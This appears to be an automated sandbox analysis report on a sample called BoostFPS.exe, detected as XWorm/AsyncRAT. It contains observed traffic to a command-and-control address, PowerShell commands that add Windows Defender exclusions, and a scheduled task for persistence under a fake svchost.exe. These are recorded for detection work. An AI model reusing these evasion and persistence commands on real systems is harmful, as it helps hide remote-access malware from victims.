                                                       Nov 20, 2024 10:38:52.684134007 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:38:52.690679073 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:39:00.152420044 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:39:00.203191042 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:39:07.473721027 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:39:07.478612900 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:39:07.971524954 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Nov 20, 2024 10:39:07.972978115 CET | 49979 | 7777 | 192.168.2.5 | 45.141.27.248
                                                       Nov 20, 2024 10:39:07.978105068 CET | 7777 | 49979 | 45.141.27.248 | 192.168.2.5
                                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                       Nov 20, 2024 10:37:08.295430899 CET | 63590 | 53 | 192.168.2.5 | 1.1.1.1
                                                       Nov 20, 2024 10:37:08.306848049 CET | 53 | 63590 | 1.1.1.1 | 192.168.2.5
                                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                       Nov 20, 2024 10:37:08.295430899 CET | 192.168.2.5 | 1.1.1.1 | 0xca37 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                       Nov 20, 2024 10:37:08.306848049 CET | 1.1.1.1 | 192.168.2.5 | 0xca37 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                      • ip-api.com
                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       0 | 192.168.2.5 | 49704 | 208.95.112.1 | 80 | 7160 | C:\Users\user\AppData\Roaming\svchost.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Nov 20, 2024 10:37:08.391427994 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                      Host: ip-api.com
                                                      Connection: Keep-Alive
                                                       Nov 20, 2024 10:37:08.880258083 CET | 175 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 20 Nov 2024 09:37:08 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 6
                                                      Access-Control-Allow-Origin: *
                                                      X-Ttl: 60
                                                      X-Rl: 44
                                                      Data Raw: 66 61 6c 73 65 0a
                                                      Data Ascii: false

                                                      Target ID:0
                                                      Start time:04:36:58
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\Desktop\BoostFPS.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\BoostFPS.exe"
                                                      Imagebase:0xd0000
                                                      File size:100'352 bytes
                                                      MD5 hash:20F5290DEF51514FEFAED2B744ED961C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:04:37:03
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" "
                                                      Imagebase:0x7ff79cc40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:04:37:03
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:04:37:03
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                      Imagebase:0x1a0000
                                                      File size:78'848 bytes
                                                      MD5 hash:A50564ADE45C0A409BB38C06673D6AB9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3313721624.00000000025EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 84%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:5
                                                      Start time:04:37:03
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\mode.com
                                                      Wow64 process (32bit):false
                                                      Commandline:Mode 100,25
                                                      Imagebase:0x7ff6a0180000
                                                      File size:33'280 bytes
                                                      MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:04:37:03
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\chcp.com
                                                      Wow64 process (32bit):false
                                                      Commandline:chcp 65001
                                                      Imagebase:0x7ff7ff6a0000
                                                      File size:14'848 bytes
                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:04:37:04
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
                                                      Imagebase:0x7ff79cc40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:04:37:07
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:04:37:08
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:04:37:14
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:04:37:14
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:04:37:25
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:04:37:25
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:04:37:42
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:04:37:42
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:04:38:06
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                                                      Imagebase:0x7ff74cf10000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:04:38:06
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:04:38:06
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Imagebase:0x360000
                                                      File size:78'848 bytes
                                                      MD5 hash:A50564ADE45C0A409BB38C06673D6AB9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:04:38:18
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                      Imagebase:0x8e0000
                                                      File size:78'848 bytes
                                                      MD5 hash:A50564ADE45C0A409BB38C06673D6AB9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:04:38:26
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                      Imagebase:0xdd0000
                                                      File size:78'848 bytes
                                                      MD5 hash:A50564ADE45C0A409BB38C06673D6AB9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:04:39:01
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Imagebase:0x130000
                                                      File size:78'848 bytes
                                                      MD5 hash:A50564ADE45C0A409BB38C06673D6AB9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abc87ad00e30a04f15116e6e13c1ed469bd817c14505be5224cb7d3b2ecf2a85
                                                        • Instruction ID: 482968ebb5eab78334bcdbe80eb39e8818bf8699c6086cdf0b415476d02f1438
                                                        • Opcode Fuzzy Hash: abc87ad00e30a04f15116e6e13c1ed469bd817c14505be5224cb7d3b2ecf2a85
                                                        • Instruction Fuzzy Hash: 8A414831E0EA899FEB95AB2858586B87BF1FF5A781F1400B7D04DC3193DE289C4A8305
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8a1aa4dcbf1e05c0a57654a11d5d42da069fd6974e87df4e3f64b008ea1cb337
                                                        • Instruction ID: 47f42fda24964d0bbf990401163d36f0ac366e7e22fd44d29d1386db9a99ac43
                                                        • Opcode Fuzzy Hash: 8a1aa4dcbf1e05c0a57654a11d5d42da069fd6974e87df4e3f64b008ea1cb337
                                                        • Instruction Fuzzy Hash: BE31E621E0EAC95FDB85AB2898597B87BE1FF5A641F1400BBD44DC3293EE189C05C311
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 55a304da0752012af271f156e27a265a301a9e63edc7c6905c0a4b4ed9b4d038
                                                        • Instruction ID: 562b81d1043eecc9c68181330ac1f294ea7dc12f23028fe28d0d738e821b29cc
                                                        • Opcode Fuzzy Hash: 55a304da0752012af271f156e27a265a301a9e63edc7c6905c0a4b4ed9b4d038
                                                        • Instruction Fuzzy Hash: 30714C30A19909CFEB98FB68C458BAD77E2FF54354F640268E05AD32D5DF38AC458B44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4be0b980702d2b1c9b5c1db3ac129e86c3c8dbc072bcf363a07227a01560349
                                                        • Instruction ID: 00f402a66a9eeb89e7463ed0346215a231ee9e72b69e3f9c853c1259ed046992
                                                        • Opcode Fuzzy Hash: b4be0b980702d2b1c9b5c1db3ac129e86c3c8dbc072bcf363a07227a01560349
                                                        • Instruction Fuzzy Hash: 95319A6288E3C29FD343A7705C664A17FB09E47260B0E40DBD4C4CB4E3E51C6A9AC762
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e7e33d22d61c3fc9c281ce841bdcfa0855a2e85ce58fbbe10891fbb755eff661
                                                        • Instruction ID: f11a475ace9a3207403b86bd2107e5f7bf872c3f4c91ee3e5c84e0d36b1a922e
                                                        • Opcode Fuzzy Hash: e7e33d22d61c3fc9c281ce841bdcfa0855a2e85ce58fbbe10891fbb755eff661
                                                        • Instruction Fuzzy Hash: FF21A131F1994D9FEB84FB2C98996BD73E2EF9C781F44007AE40EC3296DE25A8458740
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7764e35b00a7182261b823b4f3cfd49dfaa473483706d679548b51938d72a63e
                                                        • Instruction ID: c6c855f765335e5a992e1d65861336e3600dd8e406676484450cb91ba1db043e
                                                        • Opcode Fuzzy Hash: 7764e35b00a7182261b823b4f3cfd49dfaa473483706d679548b51938d72a63e
                                                        • Instruction Fuzzy Hash: 6911AC70C09B488FEB44EF68C4493EEBBF1FF58310F28416AD404A7282DB79994A8B41
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee79feb075751abaa7bed0e21c43670376b531529f6aabd322280654e2b1cb44
                                                        • Instruction ID: b9d7b457cdd026661af5cdf3cd815e25ef80ffd3e83b2e1cc5c01f5c7470b1c9
                                                        • Opcode Fuzzy Hash: ee79feb075751abaa7bed0e21c43670376b531529f6aabd322280654e2b1cb44
                                                        • Instruction Fuzzy Hash: 9C012630A1EA498FD798F73894916B833D1EF88B40F140475C549C3386DF2CEC468781
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eb691877f235629cab88592b88c18b12735f846a9ec51970f1dfd099764552bc
                                                        • Instruction ID: 4623011814268f2b7cf7d2f38ceb251a0c3dac9fd50d57ddbfbb303e55a8eae7
                                                        • Opcode Fuzzy Hash: eb691877f235629cab88592b88c18b12735f846a9ec51970f1dfd099764552bc
                                                        • Instruction Fuzzy Hash: 7801B122D0F6859FF750B778685A2B4ABE0EF56780F1900F6D449C3092EE58AC498315
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c1496d1e7d30c675fcc9e68f640bc1161cc456c5df916e8262e354f148157e4
                                                        • Instruction ID: fa48626f0e9b796c660f3a42c39039e8639c5f2da4ec897fe7938d7983b686c5
                                                        • Opcode Fuzzy Hash: 3c1496d1e7d30c675fcc9e68f640bc1161cc456c5df916e8262e354f148157e4
                                                        • Instruction Fuzzy Hash: 58F0AF30B2EA199FD698F73C944567973D2EB88B80F600579D54EC3385DF2CE8428785
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 73e02c6dd2af4200d8c173963e5b821ac25c958ca98cb2806c76b43572d534cb
                                                        • Instruction ID: afde57f31700feb5a1848694a7ea424112600e0b5a2dede62679bd4c45a16d4c
                                                        • Opcode Fuzzy Hash: 73e02c6dd2af4200d8c173963e5b821ac25c958ca98cb2806c76b43572d534cb
                                                        • Instruction Fuzzy Hash: 77F0F420A1F65A9FD758F63C94416B973C1EF88780F200575D50DC3286DE2CE8418784
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 334a65fa533e0c4275b1978e5e4a502540d3136e55c847c6cef847b8b09dfabb
                                                        • Instruction ID: a22ad15b67f62e2a746865041ce57ca135670fd80d07742e57f91918b0338506
                                                        • Opcode Fuzzy Hash: 334a65fa533e0c4275b1978e5e4a502540d3136e55c847c6cef847b8b09dfabb
                                                        • Instruction Fuzzy Hash: 1EE0CD11F1EE094FF798767C34563B5A7C2DB89B51F500039E00EC32CBDD599C824245

                                                        Execution Graph

                                                         Execution Coverage: 24.3%
                                                         Dynamic/Decrypted Code Coverage: 100%
                                                         Signature Coverage: 33.3%
                                                         Total number of Nodes: 9
                                                         Total number of Limit Nodes: 0

                                                        Control-flow Graph

                                                         [Control-flow graph rendering omitted; entry block 7ff848dae5d8-7ff848dae5f3, no named API calls in the graph]
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 9349a5aec3edfebfed8dc96ac8edfd3d76e14db8dae15629458948e7842b1329
                                                        • Instruction ID: d5937bafa6b827152ab592fadc739b2317a259f16d8ce5004a8d6f313be29d07
                                                        • Opcode Fuzzy Hash: 9349a5aec3edfebfed8dc96ac8edfd3d76e14db8dae15629458948e7842b1329
                                                        • Instruction Fuzzy Hash: 1E826330F1E60A8FEB98FB28849677972D2FF98344F644578D41EC32C6DF28A8468745

                                                        Control-flow Graph

                                                         [Control-flow graph rendering omitted; entry block 7ff848da7a81-7ff848da7a9a, CheckRemoteDebuggerPresent called in block 7ff848da7ae4-7ff848da7b3d]
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 779cee0f4aab9621a28fbd3853c426863497de3f6b21bd1914e68158aceacd62
                                                        • Instruction ID: ac9d96a0688159bac9c56facc0e1f1b76689bd40ecf4870e38e383d978ece6d8
                                                        • Opcode Fuzzy Hash: 779cee0f4aab9621a28fbd3853c426863497de3f6b21bd1914e68158aceacd62
                                                        • Instruction Fuzzy Hash: 9531FF3190C7588FCB58DF5888867E97BE0FF65321F14426AD489D7282DB34A8568B91

                                                        Control-flow Graph

                                                         [Control-flow graph rendering omitted; entry block 7ff848da1290-7ff848da170b, no named API calls in the graph]
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ab0a3fc7d63b9f42bb85ac10d5a7e15b966ab54816bb42afb3e43e0d59d755f
                                                        • Instruction ID: bdb363ac933fb69bbca0322f08ef93efe621b1267a096d22eb8efc2c81369560
                                                        • Opcode Fuzzy Hash: 4ab0a3fc7d63b9f42bb85ac10d5a7e15b966ab54816bb42afb3e43e0d59d755f
                                                        • Instruction Fuzzy Hash: BA32C320F2EA495FEB94FB38945A7B9B3D2FF98784F540579D00EC3286DF28A8058745

                                                        Control-flow Graph

                                                         [Control-flow graph rendering omitted; entry block 7ff848da16de-7ff848da16ea, no named API calls in the graph]
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15ea41c81ac9b79b066dbf9fcbae445512917a6c22999f68697735eb75469ab0
                                                        • Instruction ID: c7b731480822d453621cc4663c71a2c663ec812fe5b5e48895bb8184569ddc33
                                                        • Opcode Fuzzy Hash: 15ea41c81ac9b79b066dbf9fcbae445512917a6c22999f68697735eb75469ab0
                                                        • Instruction Fuzzy Hash: 0E22E220F2EA495FEB98FB38945A7B976D2FF98780F540579D00EC32C6DF28A8058745
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
